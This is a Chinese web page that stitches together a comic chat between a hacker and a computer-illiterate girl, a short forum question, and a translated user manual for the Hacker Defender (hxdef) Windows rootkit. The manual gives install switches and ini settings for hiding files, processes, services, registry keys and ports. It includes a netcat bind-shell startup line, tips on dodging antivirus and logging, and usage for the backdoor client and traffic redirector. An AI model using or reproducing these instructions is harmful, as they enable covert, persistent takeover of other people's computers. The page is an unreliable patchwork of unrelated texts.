黑客:hoho~~~你简直是天才,如果你把家里电闸拉了,会更省电!!
小白:..........你好像在我?!
黑客:不是好像,是就是!
小白给黑客打电话:你是不是真的很厉害
黑客:马马虎虎啦
小白:吹牛!有本事你让我的机子中木马关机..
黑客:这有何难!你等着
黑客:哈哈,搞定,后悔了吧
小白:嘿嘿,谢谢啦~~~~我在外面玩,只是想让你帮我关机的........
黑客:晕~~~~
黑客:在玩什么呢?
小白:在清理电脑
黑客:你?!
小白:对啊,你说我这里病毒多,所以我准备把不认识的看不顺眼的文件统统删掉
黑客:住手!你才认识几个文件啊?你的机子不想要了?
小白:那我现在怎么办?
黑客:别动机子,上一边玩去吧
黑客:HI,小白,这段时间没见我想我了没?
小白:才没有想你,不过你来的正好..
黑客:又出了什么事?
小白:我用驴子下电影,可是,硬盘空间不够,你能想个办法吗?
黑客:我来看看~!~
黑客:小白,告诉你一个不幸的消息,由于你的电脑里病毒太多,病毒又生下了很多仔,都在争
地盘了..
小白:啊~!~天那!
黑客:我还在听病毒们在小声议论说什么空间价又上涨了,好多病毒都买不起空间了,正准备
发起**了..
小白:那怎么办呀?
黑客:这个简单,把空间价下调,买个硬盘啦~!~
小白:555555我的密码又忘记了
黑客:记性不好就把密码写在纸上嘛
小白:太长又复杂,抄一遍都能把人累死
黑客:就你这智力,设那么长密码干什么
小白:我觉得只有复杂到自己都记不住才能防止别人破译
黑客:结果你的密码唯一作用是难为了自己........
黑客:世界杯要开始了,男人的节日啊!
小白:不光男人,我也喜欢呢~~
黑客:你?!你能看懂足球?
小白:是啊,每届世界杯我都会爬起来看的
黑客:哈,太好了,我们终于可以有共同语言了,你喜欢哪支球队啊
小白:当然是中国队!!
黑客:没语言......
小白:出来~
黑客:什么事情啊?
小白:电影能复制吗?
黑客:能啊
小白:为什么我的电影不能复制?
黑客:你用什么复制的?
小白:笨蛋,当然是软盘了!
黑客:@#$%^^%$
小白:小黑,来了吗?
红客:我是红客,追踪一个黑客来到这的~
黑客:你在说我吗?^-^
红客:――|||他的机子里怎这么多病毒,是你干的吗?!
黑客:==|||有些吧,我来之前跟现在都差不多的~不信你问他自己
小白:才不是呢!
小黑:..........
小白:他来了之后我的风扇不转了,郁闷!
黑客:....................
红客:..........................
红客:不用怕,我帮你杀杀毒吧!
黑客:***要啊~我的病毒库啊~~~
小白:好啊,我想杀毒很久的啦~!^V^
黑客:55555555~
红客:你等会
十分钟过去了
红客:郁闷~没见过这么多的病毒@_@
小白:................
黑客:55555555
红客:哇~!这是什么年代的病毒啊~?!
小白:................
黑客:哈
红客:help~!!!我的电脑被你的病毒感染了@.@
小白:=_=|||
黑客:老病毒的后代来报复了,哈哈^-^
又十分钟
红客:*_*最新的硬件跟软件防火墙都防不住,555555~俺不干了-_-#走啦!
黑客:哈哈,事实证明我的病毒库是战无不胜的,哇哈哈哈~!!!
小白:小红,不要灰心,有空再来玩玩^=^
黑客:呵呵,有空欢迎再来杀毒哦,慢走不送(^*^)
红客:@#$%^*+?=
小白:在吗?
黑客:..........嗯
小白:我的电脑坏了耶,怎么办啊
黑客:没有啊,我刚检查过,没问题的
小白:那怎么我输进入的的数字怎么都变成星星了呢?
黑客:……………………
黑客:今天有个家伙问了我一个巨白痴的问题,笑死我了
小白:哦?什么问题啊
黑客:他问U盘可以升级吗?
小白:怎么,不能吗?
黑客:......哦,不好意思,我忘了面对的是你了
小白:郁闷啊,郁闷.....
黑客:出什么事了?
小白:我很难过,冥王星被开除出九大行星了
黑客:.....跟你有什么关系?
小白:我觉得去一次好像更远了耶
黑客:去火星吧,那才适合你!
黑客:昨天猎头公司找我,说有公司想和我签约,月薪***000,奖金另算,你觉得有诱惑力吗?
小白:如果他们肯签我,我现在就去报到
黑客:你去能干什么?
小白:嗯,粗活累活不干,技术活也干不了,管理吧,我可以尝试着搞管理,当个副总什么的,只
要能给我月薪***000
黑客:你觉得有这么傻的公司吗?
小白:你帮我问问嘛,说不定人家一直在寻觅我这样的人才当副总呢,世事难料
黑客:OK,明天就向我的仇家推荐!
黑客:我的仇家找上我了
小白:啊,那你赶快逃吧..
黑客:逃哪?
小白:去一个很深的悬崖下,下面有武功秘籍,你练个十年八年再飞上来报仇..
黑客:我靠!
小白:我今天帮同学修了电脑
黑客:就你?
小白:对啊..
黑客:天大的奇迹,你居然会修电脑????
小白:有什么好奇怪,她光驱不能读电影碟..
黑客:她是不是把DVD电影放到VCD光驱,然后放不出来?
小白:对啊,所以偶就知道肯定是她光驱坏了,叫她明天再买个VCD光驱..
黑客:·······
小白:我想买个笔记本
黑客:软面抄还是硬面抄?
小白:晕倒,是笔记本电脑啦!
黑客:你买那个干什么?
小白:玩游戏、上网,关键是要漂亮、轻巧,方便带出去,最最重要的是一定要比隔壁阿花用
的神气,你说我买哪种好呢?
黑客:这么高的要求啊,"文曲星"吧,最适合你啦!
小白:你能帮我个忙吗?
黑客:只要是网络上的,说!!!
小白:我在玩――-跑跑卡丁车..你帮我去偷一个由***个排气筒的车!
黑客:那是在韩国服务器里面才有的!
小白:我不管!!!你从韩国给我偷过来!我要在中国用!那我不就很牛了!呵呵~~~!
黑客:……………………我还有事,我先走了!
小白:你会玩劲舞团吗?
黑客:会!干嘛?
小白:你帮我弄个汤姆.克鲁斯上来!我好稀饭他呀!让他陪我跳舞!:)
黑客:***
黑客:我想问你一个问题
小白:问吧
黑客:............你有男朋友吗?
小白:有!
黑客:..........他是什么样的人?
小白:高大、英俊、威猛,开大公司,对我超级好..
黑客:哦,有点事我先走了......
小白:喂~喂喂~~~~~
小白:咦,怎么好久没看到你啊,被抓了?!
黑客:..........没有,挺忙的,你还好吗
小白:好啊,我也挺忙的,我把连连看玩通关了!!
黑客:..........你和男朋友还好吧
小白:男朋友?什么男朋友?
黑客:你不是有个高大英俊威猛的男朋友吗?!
小白:哦哦~~~~瞎编的,怕你小看我........
黑客:......你、这个超级大笨蛋!!!!
黑客:..............我喜欢你
小白:病毒?
黑客:什么病毒啊?我是说很不幸,我发现我很喜欢你
小白:又忽悠我,你总骂我白痴的
黑客:对啊,你就是个大白痴,但我为了维持世界和平,决定牺牲自己,免得你去祸害他人..
小白:..................
小白:你真的喜欢我吗
黑客:..........嗯
小白:有多喜欢
黑客:就是不见的时候心里空空的疼,见了呢,头很疼
小白:哦,明白了
黑客:??你明白什么了?
小白:原来你对我,就像一个有蛀牙的小孩面对巧克力!
黑客:笔记本你可以买这款
小白:哦,这个好吗
黑客:配置不错,牌子和售后都不错
小白:这个无所谓,重要的是都有什么颜色?
黑客:............只有黑色
小白:啊?!难道这些商家不考虑消费心理,不知道加点颜色或者做成汉堡包的样子吗?
黑客:嗯,要不先去玩具柜台看看?!
一天,一陌生人加了黑客.
陌生人:你好
黑客:闲人勿扰
陌生人:我是美女!不许对美女这么没礼貌
黑客:可惜,我已经有喜欢的人了
陌生人:我比你喜欢的人漂亮100倍
黑客:但她在我心理是最美的
陌生人:好肉麻
黑客:恕不奉陪
陌生人:喂....
....
黑客(暗爽):小白,小白,连IP都没变还想考验我??
hacker defend书籍里大多数的代码是什么语言的啊?我看不懂怎么办?要学什么才能看懂呢?
Hacker defender 使用
=====[1,目录]==============================================
1.
目录
2. 概要
2.1 关于
2.2 申明
3. 使用说明
4. Ini文件说明
5.
Backdoor
5.1 Redirector
6. 技术支持
6.1 版本
6.2
钩子API函数
6.3 已知的 bugs
7. Faq
8. 文件
=====[ 2.
关于]================================================
Hacker defender
(hxdef)是一个使用于Windows NT 4.0, Windows 2000 以及Windows
XP操作系统的一个NTROOKIT,它也能运行于之后的基于NT的操作系统。主要代码是由DELPHI
6完成。新的功能使用汇编书写。驱动代码由C完成。后门和redirector客服端大部分使用 Delphi 6完成。
=====[ 2.1 概要
]=============================================
程序的主要功能是在所有运行中的进程中重写分割内存,重写一些基本的模块改变进程的状态,它几乎能够改写所有不影响系统稳定和正在运行中的进程。
程序能够完全隐藏,现在能够做的有隐藏文件、进程、系统服务、系统驱动、注册表的键值和键、开放端口以及虚构可用磁盘空间。程序同时也在内存中伪装它所做的改动,并且隐蔽地控制被隐藏进程。程序安装后能构造后门、注册表、系统服务,构造系统驱动。其本身的后门技术允许其植入
redirector。
=====[ 2.2
申明]====================================================
本项目1.0.0版本是开发源代码。
使用Hacker
defender所造成的后果作者本人概不负责。
=====[ 3. 用法
]==================================================
一个使用hxdef的简单例子:
hxdef100.exe [inifile]
或者
hxdef100.exe [switch]
直接执行EXE文件,不带任何的参数时候,默认的inifile文件为程序名.ini
。
当你执行hedef100不指定ini文件,或者你以参数模式运行时候,默认的文件是
hxdef100.ini。
下面的参数是有效的:
-:installonly - 只安装服务,不运行
-:refresh - 从INI文件中更新设置
-:noservice - 正常运行不安装服务
-:uninstall -
移除hxdef删除所有运行的后门连接,同时停止hxdef服务
例如:
hxdef100.exe
-:refresh
Hxdef拥有默认INI文件,但是我们强烈的推荐你建立自己的ini文件。关于ini文件的介绍可以看第4部分ini文件部分。
参数
-:refresh and -:uninstall
来源于本来的EXE文件。这就意味这你只要知道hxdef的运行路径和EXE名,就能够改变它的设置或者进行移除工作。
=====[ 4. Ini文件
]============================================
ini文件必须包含了9个部分: [Hidden Table],
[Root Processes], [Hidden Services], [Hidden RegKeys], [Hidden RegValues],
[Startup Run], [Free Space], [Hidden Ports]和[Settings]。
在 [Hidden Table],
[Root Processes], [Hidden Services]和[Hidden RegValues]
中能够使用*代替后面的字符,星号仅仅使用于字符的后面,任何在*之前的都是无效的。所有的在字符之前和之后的空格也是无效的。
例如:
[Hidden
Table]
hxdef*
将开始隐藏所有在Hidden
Table中以"hxdef"开头的文件、文件夹和系统进程。
在该文件列表中的所有文件和文件夹都将在文件管理器中消失。在这个列表中的程序也会在任务管理器中被隐藏。必须确保主要文件,INI文件,你的后门文件和驱动文件被包含在列表中。
在程序列表中的主进程对感染具有免淤能力,你只能利用这些主程序才能看见隐藏的文件,文件夹和程序。所以,主进程是为rootkit管理员所使用的。
由服务和驱动所组成的Hidden
Services列表将会隐藏在数据库中的安装服务和驱动。rootkit主程序的服务名默认为HackerDefender100,rootkit驱动的驱动名默认为HackerDefenderDrv100。它们两者都可以通过ini文件进行修改。
Hidden
RegKeys中列出的注册表键值将会被隐藏,Rootkit在注册表中有四个键值:默认的是HackerDefender100,
LEGACY_HACKERDEFENDER100, HackerDefenderDrv100, LEGACY_HACKERDEFENDERDRV100
如果你要重新命名服务名或者驱动名,你需要在列表中做相应的改变。
开始2个键值是和你的服务据用相同名字的,接下来的键值是LEGACY_名字。例如,如果你改变你的服务名称为BoomThisIsMySvc
,那么在注册表中,应该是这样表示的,LEGACY_BOOMTHISISMYSVC。
在Hidden
RegValues列出的注册表的值将会被隐藏。
Startup
Run列表中列出的是rootkit程序运行之后的自启动程序。这些程序和ROOTKIT具有一样的特权。程序名和它后面的参数以?分开。不要使用"字符,程序将会在用户登陆以后终止,在用户登陆以后可以使用一般和常见的方法。你可以使用下面这些快捷方式。
%cmd%标准系统的shell和路径
%cmddir%标准系统的shell文件夹
%sysdir%
- 系统文件夹
(e.g. C:\winnt\system32\)
%windir% -
标准系统文件夹
(e.g. C:\winnt\)
%tmpdir% - 临时文件夹
(e.g. C:\winnt\temp\)
例如:1)
[Startup Run]
c:\sys\nc.exe?-L -p
100 -t -e cmd.exe
nc-shell将会在rootkit运行以后监听100端口
2)
[Startup
Run]
%cmd%?/c echo Rootkit started at %TIME%
%tmpdir%starttime.txt
将rootkit启动时间保存在系统临时文件夹夹starttime。Txt文件。
(%TIME%仅仅运行于Windows2000以上的操作系统。)
Free
Space中列出的驱动硬盘名和容量大小是你想增加的硬盘,它的格式是X:NUM,其中X表示磁盘驱动器的名称,NUM表示你要增加的磁盘的容量。
例如:
[Free
Space]
C:123456789
这将在C盘增加大约123M的磁盘空间。
Hidden
Ports中列出的是你需要隐藏程序的端口,比如使用OpPorts, FPort, Active Ports, Tcp
View等的程序,它最多拥有2行。第1行的格式是TCP:tppport1,tcpport2,tcpport3
,第2行的格式是UDP:udpport1,udpport2,udpport3 ...例如:
1)
[Hidden
Ports]
TCP:8080,456
这将隐藏2个TCP端口:8080和456
2)
[Hidden
Ports]
TCP:8001
UDP:12345
这将隐藏2个端口:TCP的8001和UDP的12345。
3)
[Hidden
Ports]
TCP:
UDP:53,54,55,56,800
隐藏5个端口,都为UDP端口:53,54,55,56,800。
Settings包含了8个值:Password,
BackdoorShell, FileMappingName, ServiceName,ServiceDisplayName,
ServiceDescription, DriverName 和
DriverFileName。
名。
16位字符的Password被用于后门链接和转向,密码能根据短一些,余下的用空格代替。
BackdoorShell是复制于系统的SHELL文件,它被后门创建于一个临时的目录下。
FileMappingName,当钩子进程被存储时,用于共享内存。
ServiceName是rootkit服务
ServiceDisplayName为rootkit显示的服务
ServiceDescription位rootkit的服务描述
DriverName以hxdef驱动命名
DriverFileName以hxdef驱动文件命名
例如;
[Settings]
Password=hxdef-rulez
BackdoorShell=hxdef?.exe
FileMappingName=_.-=[Hacker
Defender]=-._
ServiceName=HackerDefender100
ServiceDisplayName=HXD Service
100
ServiceDescription=powerful NT
rootkit
DriverName=HackerDefenderDrv100
DriverFileName=hxdefdrv.sys
这就意味着你的后门密码为hxdef-rulez,后门将复制系统shell文件(通常是CMD.EXE)为hxdef?.exe到临时目录。共享内存将变为"_.-=[Hacker
Defender]=-._",服务名为"HackerDefender100",它显示的名称为"HXD Service 100",它的描述为"poweful NT
rootkit",驱动名为"HackerDefenderDrv100",驱动将被存储于一个叫做"hxdefdrv.sys"的文件中。
扩展字符|,
, , :, \, / 和 "在所有的行中都会被忽略,除了[Startup Run], [Free Space] 和 [Hidden
Ports] 项目和在 [Settings] 中first =
character后面的值。使用扩展字符能然你的INIFILE文件摆脱杀毒软件的查杀。
例如:
Example:
[Hidden
Ta/"ble]
h"xdef"*
和下面的是一样的。
[Hidden
Table]
hxdef*
更多的例如可以参照hxdef100.ini
和hxdef100.2.ini文件。
所有的在ini文件中的字符串除了那些在Settings 和 Startup
Run中的,都是无效的。
=====[ 5. Backdoor
]=========================================
Rootkit程序
Hook了一些API的功能,连接接收一些来自网络的数据包。如果接收的数据等于256个字节,密码和服务被确认,复制的SHELL被临时创建,这种情况建立以后,下一次的数据接收被重定向到这个SHELL上。
因为rootkit程序
Hook了系统中所有进程,所有在服务器上的TCP端口都将变为后门。例如,如果目标主机开放了提供HTTP服务的80端口,这个端口也能作为一个有效的后门。例外的是这个开放端口的进程不会被Hook,这个后门仅仅工作于服务器的接收缓冲大于或者等于256个字节。但是这个特征几乎适合于所有标准的服务,像IIS,APACHE,ORACLE等。后门能够隐藏是因为所有的数据都通过系统上面提供的服务转发。所以你不能使用一些简单的端口扫描软件找到它,并且它能轻易的穿过防火墙。
在测试发现IIS服务过程中,HTTP服务不能记录任何的连接日记,FTP和SMTP服务器仅仅能记录结束的断开连接。所以,如果你运行hxdef在有IIS
Web服务的服务器上面,HTTP端口跟你是连接机器使用的后门的最好端口。
如果你想连接后门的话,你将不得不使用使用一些特别的客户端,程序bdcli100.exe就是被用于如此的。
用法:bdcli100.exe
host port password
例如:
bdcli100.exe www.windowsserver.com 80
hxdef-rulez
连接服务器www.windowsserver.com使用默认的密码。客户端1.0.0版本不兼容其他老的版本。
=====[
5.1 Redirector
]==========================================
Redirector是基于后门技术。第一个连接包和后门连接一样。这就意味着你能使用相同的端口。下一个包是仅仅为Redirector特殊的包,这些包由基于运行用户电脑的重定向器生成.第一个重定向的包连接特定的目标主机和端口。
Redirectors的设置保存在与EXE文件同名的INI文件中(所以默认的是rdrbs100.ini)。如果这个文件不存在,那么在EXE文件运行的时候它会自动建立一个。最好不要额外的修改INI文件。所有的设置都可以在console中进行改变。
当ROOTKIT被安装时,如果我们需要使用服务器上面的redirectors功能,我们首先要在本地运行程序。在控制台上我们可以在有HXDEF的服务器上面建立一个映射端口路由。最后我们连接本地端口并且转换数据。转向的数据被rootkit的密码加密。在这个版本中连接的速度被限制在256K左右。在这个版本中redirectors并不适合于高速连接。Redirectors也会受到安装有rootkit的服务器的限制,而且Redirectors仅仅使用TCP协议连接。在这个版本中Redirectors
base有19条命令,他们并不是非常的敏感。关于功能的详细描述可以使用HELP命令。在Redirectors
base启动时,startup-list中的命令也被执行。startup-list中的命令可以用使用SU启动的CMD进行编辑。
Redirector区分于2种连接类型(HTTP和其他)。如果连接是其他类型的,数据包将不会被改变。如果是HTTP类型,在HTTP文件头的HOST参数将会改变为目标服务器。一个base的最大Redirector数量是1000。
Redirector仅仅适用于NT结构,只有在拥有图标的NT程序下你才能使用HIDE命令隐藏控制台。只有在NT下才能无声无息的运行,没有数据输出,没有图标,仅仅执行startup-list中的命令。例子:1)得到端口映射信息
MPINFO
No mapped ports in the
list.
2)增加MPINFO命令到startup-list并且得到startup-list中的命令。
SUADD
MPINFO
sulist
0) MPINFO
3)使用HELP命令。
HELP
Type HELP COMMAND for command details.
Valid commands
are:
HELP, EXIT, CLS, SAVE, LIST, OPEN, CLOSE, HIDE, MPINFO, ADD,
DEL,
DETAIL, SULIST, SUADD, SUDEL, SILENT, EDIT, SUEDIT,
TEST
HELP ADD
Create mapped port. You have to specify domain
when using HTTP
type.
usage: ADD LOCAL PORT MAPPING
SERVER MAPPING SERVER PORT
TARGET
SERVER
TARGET SERVER PORT PASSWORD [TYPE] [DOMAIN]
HELP
EXIT
Kill this application. Use DIS flag to discard unsaved data.
usage: EXIT
[DIS]
4)增加端口映射,我们在本地100端口进行监听,ROOTKIT安装在服务器200.100.2.36的80端口上,目标服务器是www.google.com80端口。,rootkit的密码是bIgpWd,连接类型HTTP,目标主机(www.google.com)我们知道它的IP地址是216.239.53.100。
ADD 100
200.100.2.36 80 216.239.53.100 80 bIgpWd HTTP www.google.com
ADD命令可以不加任何参数的运行,在这个例子中我们要求每一个参数都要分开。
5)现在我们再使用MPINFO检查一下映射端口
MPINFO
There are 1 mapped ports in the list. Currently 0 of them
open.
6)列举端口映射表:
LIST
000)
:100:200.100.2.36:80:216.239.53.100:80:bIgpWd:HTTP
7)一个端口映射的详细描述:
DETAIL
Listening on port: 100
Mapping server address:
200.100.2.36
Mapping server port: 80
Target server address:
216.239.53.100
Target server port: 80
Password: bIgpWd
Port
type: HTTP
Domain name for HTTP Host: www.google.com
Current state:
CLOSED
8)在没有密码的情况下,我们能在端口映射服务器200.100.2.36上测试rootkit是否已经安装(但是如果我们能确认它这样做就不再需要)
TEST 0
Testing 0) 200.100.2.36:80:bIgpWd –
OK
如果测试失败则显示:
Testing 0) 200.100.2.36:80:bIgpWd -
FAILED
9)在我们没使用之前端口仍然是没有开放的。我们不得不使用OPEN命令打开它,当端口开放时,我们也能使用CHOSE命令关闭端口。我们能使用标志符ALL应用这些命令在列表中的所有端口,这个过程可能需要一段的时间。
OPEN 0
Port number 0 opened.
CLOSE 0
Port number 0
closed.
或者 OPEN ALL
Port number 0
opened.
10)要保存当前的设置和列表我们可以使用SAVE命令,将保存所有的设置到ini文件中。(保存也会通过命令EXIT执行,而不需要DIS标志)
SAVE Saved
successfully.
开的端口能够转换我们需要的所有数据。限制你能打开你喜欢的浏览器输入网址http://localhost:100/,如果没有什么问题的话,你会看见打开的是www.google.com的主页。
第一个数据包跟你会延迟5秒钟左右,但是其他的限制仅仅取决于服务器的速度,根据这个版本的转向技术,你联网的速度大约在256K左右。
=====[
6.
技术发行]========================================
这部分包含了一些对于普通用户无关紧要的信息。这部分可能适合所有的测试者和开发人员阅读